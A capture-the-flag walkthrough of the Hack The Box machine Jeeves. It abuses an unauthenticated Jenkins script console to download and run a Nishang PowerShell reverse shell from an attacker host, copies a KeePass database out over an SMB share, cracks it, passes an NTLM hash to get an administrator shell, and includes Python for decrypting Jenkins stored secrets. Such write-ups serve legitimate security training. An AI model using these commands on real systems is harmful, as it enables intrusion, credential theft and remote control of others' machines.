Jeeves HTB
IP
10.10.10.63
initial Nmap scan
sudo nmap -sV -sC -A -oA initial_nmap 10.10.10.63
Full Nmap scan
nmap -p- -sV -oA nmap_full 10.10.10.63
Nothing more of interest turns up in the full scan. While we wait for it to complete, we'll work off the initial scan.

Ports open
80: HTTP, Microsoft IIS 10.0
135: MSRPC
445: SMB
50000: HTTP, Jetty 9.4.z-SNAPSHOT
SMB
checking whether SMB allows anonymous (null session) access to any shares
crackmapexec smb 10.10.10.63 -u anonymous -p anonymous --shares
it does not

Port 80 HTTP
The first thing we see is some kind of search engine

Let's do some directory busting and see if we can discover anything interesting
feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.63 -x asp -o dirs.txt
we don't find anything interesting
Catching a request in Burp shows nothing interesting either; submitting a search just redirects us to /error.html
But we do see the following

this doesn't seem right and could well be a rabbit hole
Port 50000 HTTP
When we navigate to port 50000 we can see the following

Not a lot going on here; let's perform some directory busting and see if we can find anything interesting
feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.63:50000 -x asp -o dirs.txt
we do find an interesting directory
http://10.10.10.63:50000/askjeeves/

Looks like we have Jenkins running on the server
Jenkins
What is Jenkins
Jenkins is an open-source continuous integration / continuous delivery and deployment (CI/CD) automation server, written in Java, and a staple DevOps tool
from the initial home page, we can see the version
Jenkins ver: 2.87
This Jenkins instance lets us reach the script console (/script, under Manage Jenkins) without logging in. The console runs arbitrary Groovy on the Jenkins controller, so we can use it to execute commands on the host and get a reverse shell onto the target machine.
Let's confirm this by executing cmd.exe from the console
cmd = """ cmd.exe /c echo "hello there" """
println cmd.execute().text

As we can see, we have code execution on the system
First, let's prepare our reverse shell
we'll use the Nishang repo
git clone https://github.com/samratashok/nishang.git
copy Invoke-PowerShellTcp.ps1 into our working directory (or wherever you will transfer it from); here the repo was cloned under /opt
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 ./
Within Invoke-PowerShellTcp.ps1 we want to edit the script
vi Invoke-PowerShellTcp.ps1

At the bottom of the script we append the call that actually invokes the function with the IP and port we want it to connect back to (Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.8 -Port 9001). The file on its own only defines the function, so without this line IEX would load it and do nothing; with it, the connection back to us is made as soon as the script is loaded.
Let's start up our Python web server, ready to serve the file
python3 -m http.server 9010
Start our netcat listener
nc -lvnp 9001
Now let's fetch and execute our PowerShell script from the script console
cmd = """ powershell "IEX(New-Object Net.WebClient).downloadstring('http://10.10.16.8:9010/Invoke-PowerShellTcp.ps1')" """
println cmd.execute().text

Once we run it in the console, we get a shell back on our netcat listener

Privilege escalation via kohsuke
Alright, let's get some information about the system
systeminfo
Host Name: JEEVES
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.10586 N/A Build 10586
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00331-20304-47406-AA297
Original Install Date: 10/25/2017, 4:45:33 PM
System Boot Time: 8/10/2023, 5:23:46 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2645 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 917 MB
Virtual Memory: Max Size: 2,687 MB
Virtual Memory: Available: 1,528 MB
Virtual Memory: In Use: 1,159 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 10 Hotfix(s) Installed.
[01]: KB3150513
[02]: KB3161102
[03]: KB3172729
[04]: KB3173428
[05]: KB4021702
[06]: KB4022633
[07]: KB4033631
[08]: KB4035632
[09]: KB4051613
[10]: KB4041689
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.63
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
We'll copy and paste this into systeminfo.txt and run wes-ng (Windows Exploit Suggester, Next Generation) against it to see if it finds a privilege escalation exploit
first let's update wes
python3 /opt/wesng/wes.py --update
Now let's run it against systeminfo.txt
python3 /opt/wesng/wes.py systeminfo.txt > possible_cves
We do get a number of candidate exploits, but we'll keep these in our back pocket for now
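Before handing systeminfo output to a suggester like wes-ng it is worth seeing what such a tool actually keys on, and catching a truncated paste: the Hotfix(s) line declares a count that the [NN]: entries below it have to match. The following Python is an added example, not code from this page or from wes-ng; it parses a constructed excerpt of the systeminfo output above (same shape, with the padding the real tool emits) into the OS build, the hotfix set and the IP addresses, and flags an incomplete hotfix list.

```python
"""Parse `systeminfo` output into the pieces an exploit suggester keys on
(OS build, installed hotfixes, IP addresses) and sanity-check the paste."""
import re

# Constructed sample: an excerpt of the systeminfo output shown on this page,
# with the key padding and [NN]: indentation the real tool emits.
SAMPLE_SYSTEMINFO = """\
Host Name:                 JEEVES
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.10586 N/A Build 10586
OS Configuration:          Standalone Workstation
System Type:               x64-based PC
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Domain:                    WORKGROUP
Hotfix(s):                 10 Hotfix(s) Installed.
                           [01]: KB3150513
                           [02]: KB3161102
                           [03]: KB3172729
                           [04]: KB3173428
                           [05]: KB4021702
                           [06]: KB4022633
                           [07]: KB4033631
                           [08]: KB4035632
                           [09]: KB4051613
                           [10]: KB4041689
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.63
"""

ITEM_RE = re.compile(r"^\[(\d+)\]:\s*(.*)$")    # "[01]: KB3150513"
FIELD_RE = re.compile(r"^([^:]+?):\s*(.*)$")    # "Key:   value", split on the first colon


def parse_systeminfo(text):
    """Return (fields, items): fields maps "Key" -> "value" for every
    "Key: value" line; items maps the most recent key to the list of
    "[NN]:" entries that follow it (hotfixes, NICs, IPs)."""
    fields, items, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ITEM_RE.match(line)
        if m:
            if current is not None:
                items.setdefault(current, []).append(m.group(2).strip())
            continue
        m = FIELD_RE.match(line)
        if m:
            key, value = m.group(1).strip(), m.group(2).strip()
        else:                      # e.g. "IP address(es)" carries no colon at all
            key, value = line, ""
        fields[key] = value
        current = key
    return fields, items


def os_build(fields):
    """Build number from "10.0.10586 N/A Build 10586" -> 10586."""
    m = re.search(r"Build (\d+)", fields.get("OS Version", ""))
    return int(m.group(1)) if m else None


def hotfixes(items):
    return {h.upper() for h in items.get("Hotfix(s)", []) if h.upper().startswith("KB")}


def hotfix_count_matches(fields, items):
    """The "Hotfix(s)" line declares how many KBs follow; a mismatch means the
    paste was truncated and any "missing patch" suggestion is suspect."""
    m = re.match(r"(\d+)", fields.get("Hotfix(s)", ""))
    return bool(m) and int(m.group(1)) == len(items.get("Hotfix(s)", []))


def ip_addresses(items):
    return items.get("IP address(es)", [])


def summary(text):
    fields, items = parse_systeminfo(text)
    return {
        "host": fields.get("Host Name"),
        "os": fields.get("OS Name"),
        "build": os_build(fields),
        "arch": fields.get("System Type"),
        "hotfixes": sorted(hotfixes(items)),
        "ips": ip_addresses(items),
        "complete": hotfix_count_matches(fields, items),
    }


if __name__ == "__main__":
    for k, v in summary(SAMPLE_SYSTEMINFO).items():
        print(f"{k}: {v}")
```

The split on the first colon is deliberate: values such as the time zone contain further colons, and the [NN]: entries are checked first so that they attach to the preceding key rather than being read as a field of their own.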
Let's see what other users are on the machine
net user

Nothing too interesting here
user privileges
whoami /priv

The privileges listed suggest a Rotten Potato style token-impersonation attack is possible (that family of attacks needs SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege on the current token); again, back pocket
Within C:\Users\Administrator\.jenkins (the Jenkins home directory)
we do find secret.key

58d05496da2496d09036d36c99b56f1e89cc662f3e65a4023de71de7e1df8afb
Running this through hash-identifier reports it is most likely a SHA-256 hash, so let's try and crack it
hashcat -m 1470 -a 0 secret_key_hash.txt /usr/share/wordlists/rockyou.txt
hmm, it won't crack (note that mode 1470 is sha256 over the UTF-16LE password; plain SHA-256 is -m 1400). That is expected: secret.key is not a digest of anything. It is 32 random bytes, written as hex, that Jenkins generates on first start and uses as key material (Jenkins hashes it with SHA-256 to derive the AES-128 key for its legacy encrypted secrets), so no wordlist will ever match it. hash-identifier only saw 64 hex characters.
Within C:\Users\Administrator\.jenkins\users\admin
we do find a config.xml file which contains the admin user's
API token
<apiToken>{AQAAABAAAAAwID3cR3pyZaEkaDPU25Z0S+nrU8+gDgB0JEWORJ5L1P2T+zXc/tSs2IVn1ugWLaui54D6yYki4vhXQtGhqUSeFw=
(the {...} form is an encrypted hudson.util.Secret container, not a hash; it is decryptable only with the instance's key material under .jenkins\secrets, or directly from the script console we already have, where hudson.util.Secret.decrypt returns its stored plaintext)
and a password hash
<passwordHash>#jbcrypt:$2a$10$QyIjgAFa7r3x8IMyqkeCluCB7ddvbR7wUn1GmFJNO2jQp2k8roehO</passwordHash>
The #jbcrypt: prefix is Jenkins' own marker; strip it and what remains ($2a$10$...) is a standard bcrypt hash, hashcat mode 3200. Let's see if we can crack it
hashcat -m 3200 -a 0 hash_config_file.txt /usr/share/wordlists/rockyou.txt
While we wait on the hash, let's keep hunting around
(we ended up escalating privileges by another route before this hash cracked)
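To make the distinction between the two values in config.xml concrete, here is an added Python example (not code from this page or from Jenkins). It wraps the page's apiToken and passwordHash in a constructed minimal config.xml (the surrounding element names are an assumption; only the apiToken and passwordHash tags are used), strips the #jbcrypt: prefix for hashcat, and decodes the Secret container header, which needs no key and already shows this is AES-CBC ciphertext rather than a hash. The apiToken is used as it appears on the page, with the closing brace and final '=' lost in the copy, which the parser tolerates. The two decryption helpers implement the Jenkins scheme (master.key hashed with SHA-256 to an AES-128 key, hudson.util.Secret decrypted with it in ECB mode and its first 16 bytes used as the CBC key) and need the `cryptography` package plus the secrets directory files, which are not on this page.

```python
"""Triage a Jenkins users/<name>/config.xml: the bcrypt password hash is
crackable once the #jbcrypt: prefix is stripped, while the API token is an
encrypted hudson.util.Secret container whose header can be read without any
key. Decryption itself needs the key material from JENKINS_HOME/secrets."""
import base64
import hashlib
import struct
import xml.etree.ElementTree as ET

# Constructed minimal config.xml wrapping the two values shown on this page.
# The surrounding element names are an assumption; extract_secrets() only
# looks at the <apiToken> and <passwordHash> tags. The token is pasted as it
# appears on the page (closing brace and final '=' missing).
CONFIG_XML = """<user>
  <id>admin</id>
  <properties>
    <jenkins.security.ApiTokenProperty>
      <apiToken>{AQAAABAAAAAwID3cR3pyZaEkaDPU25Z0S+nrU8+gDgB0JEWORJ5L1P2T+zXc/tSs2IVn1ugWLaui54D6yYki4vhXQtGhqUSeFw=</apiToken>
    </jenkins.security.ApiTokenProperty>
    <hudson.security.HudsonPrivateSecurityRealm_-Details>
      <passwordHash>#jbcrypt:$2a$10$QyIjgAFa7r3x8IMyqkeCluCB7ddvbR7wUn1GmFJNO2jQp2k8roehO</passwordHash>
    </hudson.security.HudsonPrivateSecurityRealm_-Details>
  </properties>
</user>
"""

MAGIC = b"::::MAGIC::::"   # suffix Jenkins appends to its key file before encrypting it


def extract_secrets(xml_text):
    root = ET.fromstring(xml_text)
    return {el.tag: el.text.strip() for el in root.iter()
            if el.tag in ("apiToken", "passwordHash") and el.text}


def bcrypt_for_hashcat(password_hash):
    """Jenkins stores "#jbcrypt:$2a$10$..."; hashcat -m 3200 wants only the $2a$ part."""
    prefix = "#jbcrypt:"
    if not password_hash.startswith(prefix):
        raise ValueError("not a Jenkins jbcrypt hash")
    return password_hash[len(prefix):]


def parse_secret_container(token):
    """Decode a {base64} hudson.util.Secret container (format version 1):
    0x01 | IV length (4 bytes, big-endian) | ciphertext length (4) | IV | ciphertext.
    Reading the header needs no key; it tells us this is AES-CBC data."""
    s = token.strip().lstrip("{").rstrip("}")
    s += "=" * (-len(s) % 4)                 # restore padding lost in copy/paste
    payload = base64.b64decode(s)
    if payload[0] != 1:
        raise ValueError("not a version-1 Secret container")
    iv_len, data_len = struct.unpack(">II", payload[1:9])
    iv = payload[9:9 + iv_len]
    data = payload[9 + iv_len:9 + iv_len + data_len]
    if len(iv) != iv_len or len(data) != data_len or data_len % 16:
        raise ValueError("container truncated or corrupt")
    return {"version": 1, "iv": iv, "ciphertext": data, "blocks": data_len // 16}


def aes128_key_from_text(key_text):
    """Jenkins Util.toAes128Key: SHA-256 of the trimmed key text, first 16 bytes.
    This is how master.key (and the legacy secret.key) become AES keys; the
    files hold random key material, which is why hashcat finds nothing."""
    return hashlib.sha256(key_text.strip().encode("utf-8")).digest()[:16]


def confidential_key(master_key_text, hudson_util_secret):
    """Recover the key behind {...} containers from JENKINS_HOME/secrets:
    hudson.util.Secret is AES-128-ECB encrypted under the master.key-derived
    key, ends in MAGIC, and its first 16 bytes are the key. Needs `cryptography`."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    dec = Cipher(algorithms.AES(aes128_key_from_text(master_key_text)), modes.ECB()).decryptor()
    plain = dec.update(hudson_util_secret) + dec.finalize()
    plain = plain[:-plain[-1]]                            # strip PKCS#5 padding
    if not plain.endswith(MAGIC):
        raise ValueError("master.key does not unlock hudson.util.Secret")
    return plain[:-len(MAGIC)][:16]


def decrypt_container(token, key16):
    """AES-128-CBC decrypt a version-1 container with the confidential key."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    c = parse_secret_container(token)
    dec = Cipher(algorithms.AES(key16), modes.CBC(c["iv"])).decryptor()
    plain = dec.update(c["ciphertext"]) + dec.finalize()
    return plain[:-plain[-1]].decode("utf-8")


if __name__ == "__main__":
    found = extract_secrets(CONFIG_XML)
    print("hashcat -m 3200 input:", bcrypt_for_hashcat(found["passwordHash"]))
    c = parse_secret_container(found["apiToken"])
    print(f"apiToken: v{c['version']}, {len(c['iv'])}-byte IV, {c['blocks']} AES blocks of ciphertext")
```

Run against the page's token, the header decodes to version 1, a 16-byte IV and 48 bytes (three AES blocks) of ciphertext, which is exactly what a short string encrypted under AES-CBC with PKCS#5 padding looks like. With a foothold on the box, copying secrets\master.key and secrets\hudson.util.Secret out alongside config.xml lets the two decryption helpers run offline; with script console access, hudson.util.Secret.decrypt does the same in-process.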
In C:\Users\kohsuke\Documents
we do find a KeePass database, CEH.kdbx. This is interesting; let's pull it back to our local machine

To download the file to our local machine,
let's set up an SMB server there
impacket-smbserver -smb2support connectToMe ./
Then on the target (our Nishang shell is PowerShell, so cp is Copy-Item, and it accepts the UNC path written with forward slashes)
cp CEH.kdbx //10.10.16.8/connectToMe/CEH.kdbx

Now that we have the CEH.kdbx file on our local machine,
we can install the KeePass password manager locally
sudo apt-get install keepass2
When we try to open CEH.kdbx, we are prompted for a master password
keepass2 CEH.kdbx

What we can do is use keepass2john
to convert the KeePass database into a hash format that John can crack
keepass2john CEH.kdbx > hash.txt

Now we can run john against our new hash
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
we have the master password
moonshine1

Let's open our kdbx file again
keepass2 CEH.kdbx
and enter the password

passwords (entry title: username: password)
Walmart.com: anonymous: Password
Bank of America: Michael321: 12345
it's a secret: admin: F7WhTrSFDKB6sxHU1cUn
EC-Council: hackerman123: pwndyouall!
Keys to the kingdom: bob: lCEUnYPjNfIuPZSzOySA
DC Recovery PW: administrator: S1TjAtJHKsugh9oC4VZl
Jenkins admin: admin:
Backup stuff: ?: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
The Backup stuff entry holds an LM:NT hash pair: the first half, aad3b435b51404eeaad3b435b51404ee, is the fixed LM hash of an empty password (what Windows stores when no LM hash is kept), so the NT half, e0fb1fb85756c24235ff238cbe81fe00, is the part that matters
and we have a domain/username to go with it
What we can do is use pth-winexe
to perform a pass-the-hash attack, getting a shell on the system
pth-winexe -U jenkins/administrator //10.10.10.63 cmd.exe
When prompted for the password we paste the Backup stuff hash instead (pth-winexe accepts LM:NT in place of a password; it can also be given inline as -U 'jenkins/administrator%LM:NT'), as this is the only hash in the password database
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
We have successfully passed the administrator's NTLM hash and have a shell as administrator; the domain part of the username is irrelevant for a local account on this WORKGROUP host

Reading the flag
Looking in C:\Users\Administrator\Desktop
we can't seem to find the root.txt flag; the file there is hm.txt

This is because root.txt is hidden in an NTFS alternate data stream of hm.txt. Every NTFS file has a default, unnamed $DATA stream (what dir, type and Get-Content normally show), but it can also carry additional named streams, addressed as file:streamname, which ordinary directory listings do not display and which do not count towards the file's size. hm.txt therefore looks like an ordinary small file while carrying the flag alongside it. If we run
dir /r
we can view the alternate data streams, revealing the hidden root.txt stream attached to hm.txt

To read its contents we can use PowerShell's -Stream parameter
powershell (Get-Content hm.txt -Stream root.txt)